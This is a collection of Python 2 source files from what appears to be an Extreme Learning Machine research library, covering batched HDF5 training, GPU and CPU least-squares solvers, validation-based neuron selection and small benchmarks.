            HH.ravel()[::nn+1] += self.alpha  # add to matrix diagonal trick
        # close X and T files; the reader processes reopen them
        h5 = self.opened_hdf5.pop()
        h5.close()
        h5 = self.opened_hdf5.pop()
        h5.close()
        # start async reader and writer for HDF5 files
        qX_in = mp.Queue()
        qX_out = mp.Queue(1)
        readerX = mp.Process(target=ireader, args=(fX, qX_in, qX_out))
        readerX.daemon = True
        readerX.start()
        qT_in = mp.Queue()
        qT_out = mp.Queue(1)
        readerT = mp.Process(target=ireader, args=(fT, qT_in, qT_out))
        readerT.daemon = True
        readerT.start()
        t = time()
        t0 = time()
        eta = 0
        # main loop over all the data; first iteration only prefetches
        for b in xrange(0, nb+1):
            start_next = b*batch
            stop_next = min((b+1)*batch, N)
            # prefetch data
            qX_in.put((start_next, stop_next))  # asyncronous reading of next data batch
            qT_in.put((start_next, stop_next))
            if b > 0:  # first iteration only prefetches data
                Xb = qX_out.get()
                Tb = qT_out.get()
                Xb = Xb.astype(np.float64)
                Tb = Tb.astype(np.float64)
                # process data
                Hb = self.project(Xb)
                if self.classification == "wc":  # apply per-sample weighting
                    ci = Tb.argmax(1)
                    Hb *= wc[ci, None]
                    Tb *= wc[ci, None]
                if self.accelerator == "GPU":
                    s.add_data(Hb, Tb)
                else:
                    HH += np.dot(Hb.T, Hb)
                    HT += np.dot(Hb.T, Tb)
            # report time
            eta = int(((time()-t0) / (b+1)) * (nb-b-1))
            if time() - t > self.tprint:
                print "processing batch %d/%d, eta %d:%02d:%02d" % (b+1, nb, eta/3600, (eta % 3600)/60, eta % 60)
                t = time()
        readerX.join()
        readerT.join()
        # get computed matrices back
        if self.accelerator == "GPU":
            HH, HT = s.get_corr()
            if solve:
                Beta = s.solve()
            s.finalize()
        elif solve:
            Beta = self._solve_corr(HH, HT)
        # return results
        if solve:
            return HH, HT, Beta
        else:
            return HH, HT

    def _error(self, Y1, T1, H1=None, Beta=None, rank=None):
        """Do projection and calculate error in batch mode.
        HPELM-specific iterative error for all usage cases.
        Can be _error(Y, T) or _error(None, T, H, Beta, rank)
        :param T: - true targets for error calculation
        :param H: - projected data for error calculation
        :param Beta: - current projection matrix
        :param rank: - selected neurons (= columns of H)
        """
        if Y1 is None:
            # recompute predictions from H, Beta for the selected neurons
            H, T = self._checkdata(H1, T1)
            assert rank.shape[0] == Beta.shape[0], "Wrong dimension of Beta for the given ranking"
            assert T.shape[1] == Beta.shape[1], "Wrong dimension of Beta for the given targets"
            nn = rank.shape[0]
        else:
            # use precomputed predictions Y1
            _, Y = self._checkdata(None, Y1)
            _, T = self._checkdata(None, T1)
            nn = np.sum([n1[1] for n1 in self.neurons])
        N = T.shape[0]
        batch = max(self.batch, nn)
        nb = N / batch  # number of batches
        if N > batch * nb:
            nb += 1
        if self.classification == "c":
            # misclassification rate, batch-weighted
            err = 0
            for b in xrange(nb):
                start = b*batch
                stop = min((b+1)*batch, N)
                Tb = np.array(T[start:stop])
                if Y1 is None:
                    Hb = H[start:stop, rank]
                    Yb = np.dot(Hb, Beta)
                else:
                    Yb = np.array(Y[start:stop])
                errb = np.mean(Yb.argmax(1) != Tb.argmax(1))
                err += errb * float(stop-start)/N
        elif self.classification == "wc":  # weighted classification
            c = T.shape[1]
            errc = np.zeros(c)
            for b in xrange(nb):
                start = b*batch
                stop = min((b+1)*batch, N)
                Tb = np.array(T[start:stop])
                if Y1 is None:
                    Hb = H[start:stop, rank]
                    Yb = np.dot(Hb, Beta)
                else:
                    Yb = np.array(Y[start:stop])
                for i in xrange(c):  # per-class MSE
                    idxc = Tb[:, i] == 1
                    errb = np.mean(Yb[idxc].argmax(1) != i)
                    errc[i] += errb * float(stop-start)/N
            err = np.mean(errc * self.weights_wc)
        elif self.classification == "mc":
            # multilabel error: mismatches of thresholded predictions
            err = 0
            for b in xrange(nb):
                start = b*batch
                stop = min((b+1)*batch, N)
                Tb = np.array(T[start:stop])
                if Y1 is None:
                    Hb = H[start:stop, rank]
                    Yb = np.dot(Hb, Beta)
                else:
                    Yb = np.array(Y[start:stop])
                errb = np.mean((Yb > 0.5) != (Tb > 0.5))
                err += errb * float(stop-start)/N
        else:  # MSE error
            err = 0
            for b in xrange(nb):
                start = b*batch
                stop = min((b+1)*batch, N)
                Tb = T[start:stop]
                if Y1 is None:
                    Hb = H[start:stop, rank]
                    Yb = np.dot(Hb, Beta)
                else:
                    Yb = Y[start:stop]
                errb = np.mean((Tb - Yb)**2)
                err += errb * float(stop-start)/N
        return err

    def train_hpv(self, HH, HT, Xv, Tv, steps=10):
        """Select the number of neurons on a validation set.

        Checks `steps` log-spaced neuron counts, keeps the count with the
        lowest validation error, prunes the model and stores its Beta.
        :return: (checked neuron counts, their validation errors)
        """
        X, T = self._checkdata(Xv, Tv)
        N = X.shape[0]
        nn = HH.shape[0]
        # log-spaced candidate numbers of neurons from 3 to nn
        nns = np.logspace(np.log(3), np.log(nn), steps, base=np.e, endpoint=True)
        nns = np.ceil(nns).astype(np.int)
        nns = np.unique(nns)  # numbers of neurons to check
        print nns
        k = nns.shape[0]
        err = np.zeros((k,))  # errors for these numbers of neurons
        batch = max(self.batch, nn)
        nb = N / batch  # number of batches
        if N > batch * nb:
            nb += 1
        Betas = []  # keep all betas in memory
        for l in nns:
            Betas.append(self._solve_corr(HH[:l, :l], HT[:l, :]))
        t = time()
        t0 = time()
        eta = 0
        for b in xrange(nb):
            eta = int(((time()-t0) / (b+0.0000001)) * (nb-b))
            if time() - t > self.tprint:
                print "processing batch %d/%d, eta %d:%02d:%02d" % (b+1, nb, eta/3600, (eta % 3600)/60, eta % 60)
                t = time()
            start = b*batch
            stop = min((b+1)*batch, N)
            alpha = float(stop-start)/N  # batch weight
            Tb = np.array(T[start:stop])
            Xb = np.array(X[start:stop])
            Hb = self.project(Xb)
            for i in xrange(k):
                hb1 = Hb[:, :nns[i]]
                Yb = np.dot(hb1, Betas[i])
                err[i] += self._error(Yb, Tb) * alpha
        k_opt = np.argmin(err)
        best_nn = nns[k_opt]
        self._prune(np.arange(best_nn))
        self.Beta = Betas[k_opt]
        del Betas
        print "%d of %d neurons selected with a validation set" % (best_nn, nn)
        if best_nn > nn*0.9:
            print "Hint: try re-training with more hidden neurons"
        return nns, err

    def train_myhpv(self, HH, HT, Xv, Tv, steps=10):
        """Like train_hpv, but accumulates 2x2 confusion matrices
        (binary classification) per candidate neuron count instead of
        a scalar error; does not prune the model.
        :return: (neuron counts, confusion counts per count, N samples)
        """
        X, T = self._checkdata(Xv, Tv)
        N = X.shape[0]
        nn = HH.shape[0]
        nns = np.logspace(np.log(3), np.log(nn), steps, base=np.e, endpoint=True)
        nns = np.ceil(nns).astype(np.int)
        nns = np.unique(nns)  # numbers of neurons to check
        k = nns.shape[0]
        err = np.zeros((k, 2, 2))  # errors for these numbers of neurons
        batch = max(self.batch, nn)
        nb = N / batch  # number of batches
        if N > batch * nb:
            nb += 1
        Betas = []  # keep all betas in memory
        for l in nns:
            Betas.append(self._solve_corr(HH[:l, :l], HT[:l, :]))
        t = time()
        t0 = time()
        eta = 0
        for b in xrange(nb):
            eta = int(((time()-t0) / (b+0.0000001)) * (nb-b))
            if time() - t > self.tprint:
                print "processing batch %d/%d, eta %d:%02d:%02d" % (b+1, nb, eta/3600, (eta % 3600)/60, eta % 60)
                t = time()
            start = b*batch
            stop = min((b+1)*batch, N)
            Tb = np.array(T[start:stop])
            Xb = np.array(X[start:stop])
            Hb = self.project(Xb)
            Tc = np.argmax(Tb, axis=1)
            for i in xrange(k):
                hb1 = Hb[:, :nns[i]]
                Yb = np.dot(hb1, Betas[i])
                Yc = np.argmax(Yb, axis=1)
                # confusion matrix counts: [true class, predicted class]
                err[i, 0, 0] += np.sum((Tc == 0)*(Yc == 0))
                err[i, 0, 1] += np.sum((Tc == 0)*(Yc == 1))
                err[i, 1, 0] += np.sum((Tc == 1)*(Yc == 0))
                err[i, 1, 1] += np.sum((Tc == 1)*(Yc == 1))
        return nns, err, N
<file_sep># -*- coding: utf-8 -*-
"""
Created on Fri Feb 27 05:16:53 2015
@author: Anton
"""
import numpy as np
import numexpr as ne
import os
from matplotlib import pyplot as plt
class elm(object):
    """Minimal experimental ELM with per-class weighted normal equations
    (3-class setup where class 1 samples are given by explicit indices).
    """

    def __init__(self):
        # sigmoid activation evaluated with numexpr
        self.sigm = lambda a: ne.evaluate("1/(1+exp(-a))")

    def train(self, X, T, nn, idx):
        """Train on data X with one-hot targets T using nn hidden neurons.

        :param idx: row indices used as the (reduced) second class
        :return: Xres — placeholder resampled points (see disabled block)
        """
        n,d = X.shape
        np.random.seed()
        W = np.random.randn(d, nn) * 3**0.5
        bias = np.random.randn(nn)
        self.W = W
        self.bias = bias
        H = np.dot(X,W) + bias  # random projection
        H = self.sigm(H)  # non-linear transformation
        #self.B = np.dot(np.linalg.pinv(H), T)  # linear regression
        ##################################################
        # per-class correlation matrices with small ridge term
        H1 = H[T[:,0]==1]
        T1 = T[T[:,0]==1]
        HH1 = np.dot(H1.T, H1) + 1E-6*np.eye(H1.shape[1])
        HT1 = np.dot(H1.T, T1)
        #H2 = H[T[:,1]==1]
        #T2 = T[T[:,1]==1]
        H2 = H[idx]
        T2 = T[idx]
        HH2 = np.dot(H2.T, H2) + 1E-6*np.eye(H2.shape[1])
        HT2 = np.dot(H2.T, T2)
        """
        ### RESAMPLING
        Nsampl = H2.shape[0]
        s = (np.std(X[T[:,0]==1], axis=0) + np.std(X[idx], axis=0) + np.std(X[T[:,2]==1], axis=0)) / 3
        Nres = (np.sum(T[:,0]==1) + np.sum(T[:,2]==1)) / 2
        Xres = np.zeros((Nres, d))
        for i in xrange(Nres):
            sampl = X[idx][np.random.randint(Nsampl)]
            Xres[i] = sampl + np.random.randn(1,d)*s
        H2res = np.dot(Xres,W) + bias
        H2res = self.sigm(H2res)
        T2res = np.tile(T2[0], (Nres,1))
        H2 = np.vstack((H2, H2res))
        T2 = np.vstack((T2, T2res))
        HH2 = np.dot(H2.T, H2) + 1E-6*np.eye(H2.shape[1])
        HT2 = np.dot(H2.T, T2)
        #"""
        Xres=np.zeros((3,2))
        H3 = H[T[:,2]==1]
        T3 = T[T[:,2]==1]
        HH3 = np.dot(H3.T, H3) + 1E-6*np.eye(H3.shape[1])
        HT3 = np.dot(H3.T, T3)
        N = n*1.0
        # class weights inverse to class sizes, normalized to sum to 1
        # (the first, uniform assignment is immediately overwritten)
        k = np.array([1, 1, 1], dtype=np.float64)
        k = np.array([N/H1.shape[0], N/H2.shape[0], N/H3.shape[0]]).astype(np.float64)
        k = k / np.sum(k)
        HH = k[0]*HH1 + k[1]*HH2 + k[2]*HH3
        HT = k[0]*HT1 + k[1]*HT2 + k[2]*HT3
        ##################################################
        #HH = H.T.dot(H) + 1E-6*np.eye(H.shape[1])
        #HT = H.T.dot(T)
        self.B = np.linalg.lstsq(HH, HT)[0]
        return Xres

    def run(self, X):
        """Predict raw outputs for inputs X with the trained model."""
        H = np.dot(X, self.W) + self.bias
        H = self.sigm(H)
        return np.dot(H, self.B)
def code(nn):
    """10-fold cross-validation accuracy of `elm` on the Iris dataset,
    reading pre-split .npy folds from ../datasets/Classification-Iris.

    NOTE(review): `e.train(Xtr, Ytr, nn)` omits the `idx` argument that
    elm.train requires — this would raise TypeError; likely stale code
    from before the signature changed. Confirm before use.
    """
    folder = 'Classification-Iris'
    folder = os.path.join(os.path.dirname(__file__), "../datasets", folder)
    acc = np.zeros((10,))
    for i in range(10):  # 10-fold cross-validation
        # get file names
        Xtr = np.load(os.path.join(folder, "xtrain_%d.npy" % (i + 1)))
        Xts = np.load(os.path.join(folder, "xtest_%d.npy" % (i + 1)))
        Ytr = np.load(os.path.join(folder, "ytrain_%d.npy" % (i + 1)))
        Yts = np.load(os.path.join(folder, "ytest_%d.npy" % (i + 1)))
        # train ELM on a reduced feature/class subset
        Xtr = Xtr[:,2:]
        Xts = Xts[:,2:]
        Ytr = np.hstack((Ytr[:,:2], Ytr[:,3][:,None]))
        Yts = np.hstack((Yts[:,:2], Yts[:,3][:,None]))
        e = elm()
        e.train(Xtr, Ytr, nn)
        Yh = e.run(Xts)
        # evaluate classification results
        Yts = np.argmax(Yts, 1)
        Yh = np.argmax(Yh, 1)
        acc[i] = float(np.sum(Yh == Yts)) / Yts.shape[0]
    return acc
def code_show(nn, i):
    """Train `elm` on fold i of the Iris data using two features, print
    accuracy, and plot the decision surface with the training points.
    """
    folder = 'Classification-Iris'
    folder = os.path.join(os.path.dirname(__file__), "../datasets", folder)
    acc = np.zeros((10,))
    # get file names
    Xtr = np.load(os.path.join(folder, "xtrain_%d.npy" % (i + 1)))
    Xts = np.load(os.path.join(folder, "xtest_%d.npy" % (i + 1)))
    Ytr = np.load(os.path.join(folder, "ytrain_%d.npy" % (i + 1)))
    Yts = np.load(os.path.join(folder, "ytest_%d.npy" % (i + 1)))
    # train ELM
    #Xtr = Xtr[:,2:]
    #Xts = Xts[:,2:]
    # keep only two input features (columns i1, i2) for a 2-D plot
    i1 = 0
    i2 = 3
    Xtr = np.vstack((Xtr[:,i1], Xtr[:,i2])).T
    Xts = np.vstack((Xts[:,i1], Xts[:,i2])).T
    Ytr = np.hstack((Ytr[:,:2], Ytr[:,3][:,None]))
    Yts = np.hstack((Yts[:,:2], Yts[:,3][:,None]))
    #print '1'
    #print Xtr[Ytr[:,0]==1].std(axis=0)**2
    #print Xtr[Ytr[:,1]==1].std(axis=0)**2
    # prepare mesh grid for the decision-surface image
    x = np.arange(-2.5, 2.5, 0.1)
    y = np.arange(-2.5, 2.5, 0.1)
    n = x.shape[0]
    xm, ym = np.meshgrid(x, y)
    D = np.vstack((xm.ravel(), ym.ravel())).T
    # reduce number of samples of one class
    N2 = 2
    idx = np.where(Ytr[:,1]==1)[0]
    np.random.shuffle(idx)
    idx = idx[:N2]
    # fixed indices override the random choice for reproducible figures
    idx = np.array([21, 76])
    print idx
    # average over many runs (currently a single run)
    Z = []
    acc = []
    for _ in range(1):
        e = elm()
        Xres = e.train(Xtr, Ytr, nn, idx)
        # evaluate classification results
        Yh = e.run(Xts)
        Yts1 = np.argmax(Yts, 1)
        Yh1 = np.argmax(Yh, 1)
        acc.append(float(np.sum(Yh1 == Yts1)) / Yts1.shape[0])
        # show plot
        Z.append(e.run(D))
    Z = np.array(Z).mean(0)
    print "acc:", np.mean(acc)
    # build an RGB image from the 3 class outputs, normalized per pixel
    I = Z.copy()
    Z[Z<0] = 0
    I[I<0] = 0
    I = I.reshape(n,n,3)
    I = I / I.max(axis=2)[:,:,None]
    I = I[::-1, :, :]
    plt.imshow(I, extent=[-2.5, 2.5, -2.5, 2.5])
    #cl = 1
    #plt.contour(xm, ym, Z[:,cl].reshape(n,n), colors='k')
    #plt.contourf(xm, ym, Z[:,cl].reshape(n,n), cmap=plt.cm.bone)
    #plt.scatter(D[:,0], D[:,1], s=Z[:,0])
    #Xa = np.vstack((Xtr, Xts))
    #Ya = np.vstack((Ytr, Yts))
    #plt.scatter(Xa[:,0], Xa[:,1], c=Ya)
    #plt.scatter(Xtr[:,0], Xtr[:,1], c=Ytr)
    plt.scatter(Xtr[Ytr[:,0]==1,0], Xtr[Ytr[:,0]==1,1], c=Ytr[Ytr[:,0]==1])
    plt.scatter(Xtr[idx,0], Xtr[idx,1], c=Ytr[idx])
    plt.scatter(Xres[:,0], Xres[:,1], c=Ytr[idx[0]])
    plt.scatter(Xtr[Ytr[:,2]==1,0], Xtr[Ytr[:,2]==1,1], c=Ytr[Ytr[:,2]==1])
    plt.show()
if __name__ == "__main__":
    # visualize one fold with 7 hidden neurons; the commented block
    # averaged accuracy of code(nn) over 100 repetitions
    nn = 7
    #m = []
    #for _ in range(100):
    #    acc = code(nn)
    #    m.append(np.mean(acc))
    #m = np.array(m)*100
    #print "%.1f+-%.1f" % (np.mean(m), np.std(m))
    code_show(nn, 0)
<file_sep># -*- coding: utf-8 -*-
"""
Created on Fri Mar 20 14:27:13 2015
@author: akusok
"""
from gpu_solver import GPUSolver, gpu_solve
import numpy as np
from scipy.linalg import solve
import sys
from time import time
def s_cpu(data, n, nrhs):
    """Accumulate normal equations X'X, X'T over data batches on the CPU
    and solve the symmetric positive-definite system for Beta.

    :param data: iterable of (X, T) batch pairs
    :param n: number of columns of X (system size)
    :param nrhs: number of right-hand sides (columns of T)
    :return: Beta, the (n, nrhs) least-squares solution
    """
    XX = np.zeros((n, n))
    XT = np.zeros((n, nrhs))
    for X, T in data:
        t = time()
        XX += X.T.dot(X)
        XT += X.T.dot(T)
        print("CPU: added batch in %.2fs" % (time() - t))
    t = time()
    # fix: 'sym_pos=True' was deprecated and removed in SciPy 1.11;
    # assume_a='pos' is the documented equivalent.
    Beta = solve(XX, XT, assume_a='pos')
    print("CPU: solution in %.2fs" % (time() - t))
    return Beta
def s_gpu(data, n, nrhs):
    """Accumulate the same normal equations on the GPU via GPUSolver
    and solve for Beta; timing printed per batch for comparison with s_cpu.

    :param data: iterable of (X, T) batch pairs
    :param n: system size
    :param nrhs: number of right-hand sides
    :return: B, the GPU solution
    """
    s = GPUSolver(n, nrhs)
    for X, T in data:
        t = time()
        s.add_data(X, T)
        print "GPU: added batch in %.2fs" % (time()-t)
    t = time()
    B = s.solve()
    print "GPU: solution in %.2fs" % (time()-t)
    return B
def test():
    """Benchmark and cross-check GPU vs CPU solvers on random data.

    Reads problem sizes from sys.argv: n (neurons), nrhs (targets),
    k (number of data batches); prints the norm of the difference.
    """
    n = int(sys.argv[1])
    nrhs = int(sys.argv[2])
    k = int(sys.argv[3])
    data = []
    for _ in range(k):
        n1 = int(n*0.7)  # each batch has fewer rows than columns
        X = np.random.rand(n1, n).astype(np.float64)
        T = np.random.rand(n1, nrhs).astype(np.float64)
        data.append((X, T))
    B = s_gpu(data, n, nrhs)
    Beta = s_cpu(data, n, nrhs)
    print "Norm of CPU-GPU difference:", np.linalg.norm(B - Beta)
if __name__ == "__main__":
    # CLI entry point: expects exactly 3 arguments (see test())
    if len(sys.argv) != 4:
        print "add arguments: number of neurons, number of targets, number of batches of data"
    else:
        test()
        print "Works!"
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Jan 6 19:05:03 2014
@author: akusoka1
"""
import numpy as np
from time import time
# Quick benchmark: time the Gram-matrix product H'H at MNIST-like scale
# (60000 samples, 784 features).
n = 60000
k = 784
d = 10
H = np.random.randn(n,k)
Y = np.random.randn(n,d)  # NOTE(review): Y is created but never used below
t = time()
W = H.T.dot(H)
t = time() - t
print "runtime: %.2f" % t
print "done"
<file_sep>'''
Created on May 14, 2014
@author: akusoka1
'''
import numpy as np
from time import time
def test_small():
    """Benchmark matrix products of constant total size (2 GB of float64)
    at varying aspect ratios (1 to 1024 'neurons').
    WARNING: allocates ~4 GB of RAM.
    """
    b = 2**28  # 1GB RAM
    A = np.random.random_sample((b,)).astype(np.float64)
    B = np.random.random_sample((b,)).astype(np.float64)
    print A.shape, B.shape
    # first size repeated to warm up caches/BLAS
    for nn in [1,1,2,4,8,16,32,64,128,256,512,1024]:
        N = b/nn
        A = A.reshape(nn,N)
        B = B.reshape(N,nn)
        t = time()
        np.dot(A,B)
        t = time() - t
        print "%.1f GB RAM, %d neurons: %.2f seconds, complex %.1f" % (((nn*N*8.0) / 2**29), nn, t, (1.0*nn*N*nn)/2**28)
def test_large():
    """Benchmark decompositions/solvers (currently only QR-based solve)
    on large square random matrices; inv/SVD timings are disabled.
    WARNING: allocates ~4 GB of RAM.
    """
    b = 2**28  # 1GB RAM
    A = np.random.random_sample((b,)).astype(np.float64)
    B = np.random.random_sample((b,)).astype(np.float64)
    print A.shape, B.shape
    for nn in [5000,10000]:
        N = b/nn
        #A = A.ravel()[:nn*N].reshape(nn,N)
        #B = B.ravel()[:nn*N].reshape(N,nn)
        C = np.random.rand(nn,nn)
        #t = time()
        #np.linalg.pinv(C)
        #t1 = time() - t
        #t = time()
        #np.linalg.svd(C)
        #t2 = time() - t
        t1=0
        t2=0
        B = np.random.rand(nn,10)
        t = time()
        # solve C x = B via QR factorization
        Q,R = np.linalg.qr(C)
        P = np.dot(Q.T, B)
        np.dot(np.linalg.inv(R), P)
        t3 = time() - t
        print "%.1f GB RAM, %d neurons: inv %.2fs, SVD %.2fs, QR %.2fs" % (((nn*N*8.0) / 2**29), nn, t1, t2, t3)
if __name__ == '__main__':
    # run only the large-matrix benchmark by default
    test_large()
"""
Created on Sat Feb 21 20:46:31 2015
@author: akusok
"""
from mrsr import mrsr
from mrsr2 import mrsr2
from hdf5_tools import make_hdf5, normalize_hdf5, ireader, iwriter
from rbf_param import rbf_param<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
from slfn import SLFN
class HPELM(SLFN):
"""High performance GPU and parallel Extreme Learning Machine.
"""
# inherited def __init__(self, inputs, outputs):
# inherited def _checkdata(self, X, T):
# inherited def add_neurons(self, number, func, W=None, B=None):
# inherited def project(self, X):
# inherited def predict(self, X):
# inherited def save(self, model):
# inherited def load(self, model):
def __init__(self, X, T, *args, **kvargs):
"""Universal contructor of ELM model with model structure selection.
:param X: input data matrix
:param T: target data matrix
:param Xmean: vector of mean value of X for normalization !!! hpelm
:param Xstd: vector of srd of X for normalization !!! hpelm
Model structure selection (exclusive, choose one)
:param "V": use validation set
:param "CV": use cross-validation
:param "MCCV": use Monte-Carlo cross-validation
:param "LOO": use leave-one-out validation
Additional validation parameters
:param Xv: validation data X ("V")
:param Tv: validation targets T ("V")
:param k: number of splits ("CV", "MCCV")
:param n: number of repetitions ("MCCV")
Ranking of hidden neurons
:param "HQ": use Hannan-Quinn criterion
# no OP-ELM
System setup
:param "classification"/"c": build ELM for classification
:param "multiclass"/"mc": build ELM for multiclass classification
:param "adaptive"/"ad": build adaptive ELM for non-stationary model
:param "batch": batch size for adaptive ELM (sliding window step size)
"""
print X.shape
print T.shape
print "start args"
for arg in args:
print arg
print "start kvargs"
for kv, arg in kvargs.items():
print kv, arg
print "end (kv)args"
N, inputs = X.shape
_, targets = T.shape
super(ELM, self).__init__(inputs, targets)
def train(self, X, T):
"""Learn a model to project inputs X to targets T.
:param X: - matrix of inputs
:param T: - matrix of targets
"""
assert len(self.neurons) > 0, "Add neurons before training ELM"
X, T = self._checkdata(X, T)
H = self.project(X)
self.Beta = np.linalg.pinv(H).dot(T)
''' COPY OF OLD PRUNING METHODS
def prune_op(self, X, T, batch=10000, delimiter=" "):
"""Prune ELM as in OP-ELM paper.
"""
# get data iterators
genX, self.inputs, N = batchX(X, batch, delimiter)
genT, self.targets = batchT(T, batch, delimiter, self.C_dict)
# project data
nn = len(self.ufunc)
delta = 0.95 # improvement of MSE for adding more neurons
nfeats = []
neurons = np.zeros((nn,))
for X1,T1 in zip(genX, genT):
# get hidden layer outputs
H = np.dot(X1,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
H,T1 = semi_Tikhonov(H,T1,self.Tmean) # add Tikhonov regularization
# get ranking of neurons in that batch
rank = mrsr(H, T1, nn)
# select best number of neurons
MSE = press(H[:, rank[:2]], T1, self.classification, self.multiclass)
R_opt = rank[:2]
early_stopping = int(nn/10) + 1 # early stopping if no improvement in 10% neurons
last_improvement = 0
for i in range(3, nn):
last_improvement += 1
r = rank[:i]
mse1 = press(H[:,r], T1, self.classification, self.multiclass)
if mse1 < MSE * delta:
MSE = mse1
R_opt = r
last_improvement = 0
elif last_improvement > early_stopping: # early stopping if MSE raises
break
r = R_opt
# save number of neurons and their ranking information
nfeats.append(len(r))
# first selected neuron gets weight 2, last one gets weight 1
neurons[r] += np.linspace(2,1,num=len(r))
# combine neuron ranking
nfeats = np.round(np.mean(nfeats))
neurons = np.argsort(neurons)[::-1][:nfeats] # sorting in descending order
# update ELM parameters and re-calculate B
self.W = self.W[:,neurons]
self.ufunc = [self.ufunc[j] for j in neurons]
self.train(X, T, batch=batch, delimiter=delimiter)
def prune_op2(self, X, T, norm=1, batch=10000, delimiter=" "):
"""Prune ELM with a more recent implementation of MRSR.
:param norm: - check numpy.linalg.norm(X, <norm>)
"""
# get data iterators
genX, self.inputs, N = batchX(X, batch, delimiter)
genT, self.targets = batchT(T, batch, delimiter, self.C_dict)
# project data
nn = len(self.ufunc)
delta = 0.95 # improvement of MSE for adding more neurons
nfeats = []
neurons = np.zeros((nn,))
for X1,T1 in zip(genX, genT):
# get hidden layer outputs
H = np.dot(X1,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
H,T1 = semi_Tikhonov(H,T1,self.Tmean) # add Tikhonov regularization
# get ranking of neurons in that batch
# this MRSR2 is a class, with <.rank> attribute and <.new_input()> method
M = mrsr2(H, T1, norm)
M.new_input()
M.new_input()
# select best number of neurons
MSE = press(H[:, M.rank], T1, self.classification, self.multiclass)
R_opt = M.rank
early_stopping = int(nn/10) + 1 # early stopping if no improvement in 10% neurons
last_improvement = 0
for i in range(3, nn):
last_improvement += 1
M.new_input()
mse1 = press(H[:, M.rank], T1, self.classification, self.multiclass)
if mse1 < MSE * delta:
MSE = mse1
R_opt = M.rank
last_improvement = 0
elif last_improvement > early_stopping: # early stopping if MSE raises
break
rank = R_opt
del M
# save number of neurons and their ranking information
nfeats.append(len(rank))
# first selected neuron gets weight 2, last one gets weight 1
neurons[rank] += np.linspace(2,1,num=len(rank))
# combine neuron ranking
nfeats = np.round(np.mean(nfeats))
neurons = np.argsort(neurons)[::-1][:nfeats] # sorting in descending order
# update ELM parameters and re-calculate B
self.W = self.W[:,neurons]
self.ufunc = [self.ufunc[j] for j in neurons]
self.train(X, T, batch=batch, delimiter=delimiter)
'''
<file_sep># -*- coding: utf-8 -*-
"""
Created on Tue Apr 7 17:48:46 2015
@author: akusok
"""
import numpy as np
from scipy.spatial.distance import cdist
from multiprocessing import Pool, cpu_count
from time import time, sleep
def f(a):
    """Pool worker: squared-Euclidean distances for one row chunk.

    `a` is a tuple (h, w, ix); returns (cdist(h, w, 'sqeuclidean'), ix) so
    the caller can scatter the chunk back into the full distance matrix.
    """
    chunk, centers, chunk_idx = a
    distances = cdist(chunk, centers, "sqeuclidean")
    return distances, chunk_idx
# @profile
def run():
    """Benchmark cdist: one direct call vs. a chunked multiprocessing Pool.

    Computes the same squared-Euclidean distance matrix twice, prints the
    timings of both strategies, and asserts the results agree.
    """
    # NOTE(review): H has only 2 rows here, so the parallel path is mostly
    # overhead; presumably meant to be scaled up for real benchmarking.
    H = np.random.rand(2,300)
    W = np.random.rand(3000, 300)
    t = time()
    C1 = cdist(H, W, "sqeuclidean")
    print time() - t
    print "done 1"
    t = time()
    k = cpu_count()
    N = H.shape[0]
    # split row indices into k*10 chunks; one job tuple per chunk
    idxs = np.array_split(np.arange(N), k*10)
    jobs = [(H[ix], W, ix) for ix in idxs]
    p = Pool(k)
    C1p = np.empty((N, W.shape[0]))
    # serial reference version of the scatter loop below:
    # for h, w, ix in jobs:
    #     C1p[ix] = cdist(h, w, "sqeuclidean")
    t2 = time()
    # f returns (distances, ix); scatter each finished chunk into place
    for h0, ix in p.imap(f, jobs):
        C1p[ix] = h0
    print time() - t2
    p.close()
    print time() - t
    # both strategies must produce the same matrix
    assert np.allclose(C1, C1p)
    # C = cdist(H, W, "cityblock")
    # C = cdist(H, W, "chebyshev")
# @profile
def run_all():
    """Entry-point wrapper so the whole benchmark is captured by @profile."""
    c = run()
    print "Done"
run_all()
<file_sep># -*- coding: utf-8 -*-
"""
Created on Fri Nov 21 18:52:32 2014
@author: akusok
"""
import numpy as np
def semi_Tikhonov(H, T, Tmean):
    """Append semi-Tikhonov regularization rows to (H, T).

    Adds roughly 10% extra rows of tiny random noise to H, paired in T with
    the target mean `Tmean` ("zero" shifted by E[T], because projecting noise
    to an exact zero would introduce a bias).

    :param H: 2-d array of hidden-layer outputs, shape (n, d)
    :param T: 2-d array of targets, shape (n, c)
    :param Tmean: column-wise mean of T (1-d array or a single row)
    :return: tuple (H, T) with nT = n // 10 + 1 regularization rows appended
    """
    # fix: use floor division so nT stays an int under Python 3 as well;
    # the old "/" produced a float and np.random.rand(nT, ...) raised TypeError
    nT = H.shape[0] // 10 + 1
    tkH = np.random.rand(nT, H.shape[1]) * 10E-6  # near-zero noise inputs
    tkT = np.tile(Tmean, (nT, 1))                 # mapped to E[T], not exact zero
    H = np.vstack((H, tkH))
    T = np.vstack((T, tkT))
    return H, T
<file_sep># -*- coding: utf-8 -*-
"""
Created on Fri Mar 20 14:27:13 2015
@author: akusok
"""
from magma_solver import GPUSolver
import numpy as np
import sys
from time import time
@profile
def s_cpu(data, n, nrhs):
    """Solve the batched least-squares system on the CPU.

    Accumulates the normal equations XX = sum(X'X) and XT = sum(X'T) over
    the batches in `data`, then returns Beta = inv(XX).dot(XT).

    :param data: iterable of (X, T) batch pairs
    :param n: number of columns of X (rows of Beta)
    :param nrhs: number of right-hand sides (columns of T and Beta)
    :return: solution matrix Beta of shape (n, nrhs)
    """
    XX = np.zeros((n,n))
    XT = np.zeros((n,nrhs))
    for X,T in data:
        t = time()
        XX = XX + X.T.dot(X)
        XT = XT + X.T.dot(T)
        print "added batch in %.2fs" % (time()-t)
    t = time()
    # NOTE(review): explicit inverse; np.linalg.solve(XX, XT) would be cheaper
    # and numerically safer — kept as-is since this is a timing comparison.
    P = np.linalg.inv(XX)
    print "solution in %.2fs" % (time()-t)
    Beta = P.dot(XT)
    return Beta
@profile
def s_gpu(data, n, nrhs):
    """Solve the same batched system with the MAGMA-backed GPUSolver.

    :param data: iterable of (X, T) batch pairs streamed into the solver
    :param n: problem size (columns of X)
    :param nrhs: number of right-hand sides
    :return: solution matrix returned by GPUSolver.solve()
    """
    s = GPUSolver(n, nrhs)
    for X,T in data:
        s.add_data(X, T)
    B = s.solve()
    return B
@profile
